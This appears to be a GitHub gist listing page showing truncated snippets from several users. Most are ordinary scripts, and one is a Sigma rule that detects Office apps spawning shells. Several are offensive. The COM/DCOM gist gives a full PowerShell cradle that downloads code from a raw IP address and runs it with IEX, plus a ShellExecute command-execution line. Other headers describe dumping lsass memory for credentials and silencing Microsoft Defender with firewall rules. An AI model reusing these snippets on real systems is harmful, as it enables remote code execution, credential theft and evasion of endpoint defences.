dcgithub

💭
for those about to rock!..
  • None
  • Brisbane
@ffcommax
ffcommax / rdphistory.ps1
Created November 29, 2021 18:17
rdphistory
$LogName = 'Microsoft-Windows-TerminalServices-LocalSessionManager/Operational'
$Results = @()
$Events = Get-WinEvent -LogName $LogName
foreach ($Event in $Events) {
$EventXml = [xml]$Event.ToXML()
$ResultHash = @{
Time = $Event.TimeCreated.ToString()
'Event ID' = $Event.Id
'Desc' = ($Event.Message -split "`n")[0]
@r00t-3xp10it
r00t-3xp10it / SuperHidden.ps1
Last active October 13, 2022 02:42
Query\Create\Delete super hidden system folders
<#
.SYNOPSIS
Query\Create\Delete super hidden system folders
Author: @r00t-3xp10it
Tested Under: Windows 10 (19043) x64 bits
Required Dependencies: attrib {native}
Optional Dependencies: none
PS cmdlet Dev version: v1.2.18
@ffcommax
ffcommax / Microsoft Office Product Spawning Windows Shell.yml
Created November 8, 2021 13:20
Microsoft Office Product Spawning Windows Shell
title: Microsoft Office Product Spawning Windows Shell
id: 438025f9-5856-4663-83f7-52f878a70a50
status: experimental
description: Detects a Windows command and scripting interpreter executable started from Microsoft Word, Excel, Powerpoint, Publisher and Visio
references:
- https://www.hybrid-analysis.com/sample/465aabe132ccb949e75b8ab9c5bda36d80cf2fd503d52b8bad54e295f28bbc21?environmentId=100
- https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html
tags:
- attack.execution
- attack.t1204 # an old one
@dylanlangston
dylanlangston / DefaultBrowser.cs
Last active December 22, 2024 16:37
Set Default Browser on Windows 10/11 in C#
using System;
using System.IO;
using System.Diagnostics;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Runtime.InteropServices;
using Microsoft.Win32;
@cowboy
cowboy / run-in-console.js
Last active September 8, 2023 09:45
Amits Launch Pad Pro Light Show Editor - Unofficial Launchpad Mini Mk3 support
// Run this in the console at https://midi.amitszone.com/LPP_LIGHTSHOW_BUILDER/
// to get it to work with the Launchpad Mini Mk3. It may work with other new
// Launchpads, I'm not sure (If it does, comment below, thanks!)
(() => {
// Create mapping of Launchpad Pro -> Mini Mk3 notes
// (This is only the mapping for the 8x8 grid area)
const noteMap = {}
for (let i = 1; i <= 8; i++) {
for (let j = 1; j <= 8; j++) {
@rkttu
rkttu / ConvertTo-AnimatedGif.ps1
Created October 28, 2021 01:58
Animated GIF conversion PowerShell function
function ConvertTo-AnimatedGif {
param (
[string]$VideoFilePath = $(Read-Host -Prompt 'Enter a video file path.'),
[int]$FramePerSeconds = 10,
[int]$Scale = 320,
[switch]$Verbose
)
$ffmpegCommand = (Get-Command -ErrorAction Ignore 'ffmpeg.exe')
@r00t-3xp10it
r00t-3xp10it / DumpLsass.ps1
Last active March 27, 2024 21:51
Dump Lsass.exe process memory to retrieve credentials!
<#
.SYNOPSIS
Dump Lsass.exe process memory to retrieve credentials!
Author: @r00t-3xp10it
Mitre : T1003 (lolbas)
Tested Under: Windows 10 (19042) x64 bits
Required Dependencies: Admin privs, rundll32.exe, comsvcs.dll
Optional Dependencies: cmd, Invoke-WebRequest
PS cmdlet Dev version: v1.0.7
@ffcommax
ffcommax / Abusing COM & DCOM objects.ps1
Last active June 6, 2023 09:21
Abusing COM & DCOM objects
https://www.exploit-db.com/docs/48767
Msxml2.XMLHTTP.3.0
$o = [activator]::CreateInstance([type]::GetTypeFromCLSID("F5078F35-C551-11D3-89B9-0000F81FE221")); $o.Open("GET", "http://87.236.212.22:443/xsllsx", $False); $o.Send(); IEX $o.responseText;
ShellWindows
$hb = [activator]::CreateInstance([type]::GetTypeFromCLSID("9BA05972-F6A8-11CF-A442-00A0C90A8F39"))
$item = $hb.Item()
$item.Document.Application.ShellExecute("cmd.exe","/c calc.exe","c:\windows\system32",$null,0)
@r00t-3xp10it
r00t-3xp10it / SilenceDefender_ATP.ps1
Last active October 13, 2022 01:23
silencing microsoft defender for endpoint using firewall rules
<#
.SYNOPSIS
Silencing microsoft defender using firewall rules!
Author: @r00t-3xp10it
Credits to: csis-techblog
Tested Under: Windows 10 (19042) x64 bits
Required Dependencies: Administrator privileges
Optional Dependencies: none
PS cmdlet Dev version: v1.0.6
@jdgregson
jdgregson / switchCase.js
Created October 17, 2021 21:46
Switches the case of alpha characters in a given string such that A becomes a, j becomes J, and 5 remains 5.
/**
* Switches the case of alpha characters in a given string such that A becomes
* a, j becomes J, and 5 remains 5.
* @param {string} input The string to switch cases on.
* @return {string} the string with the capitalization of all alpha characters
* inverted.
*/
const switchCase = (input) => {
return input.split('').map((c) => {
return c.toUpperCase() === c ? c.toLowerCase() : c.toUpperCase();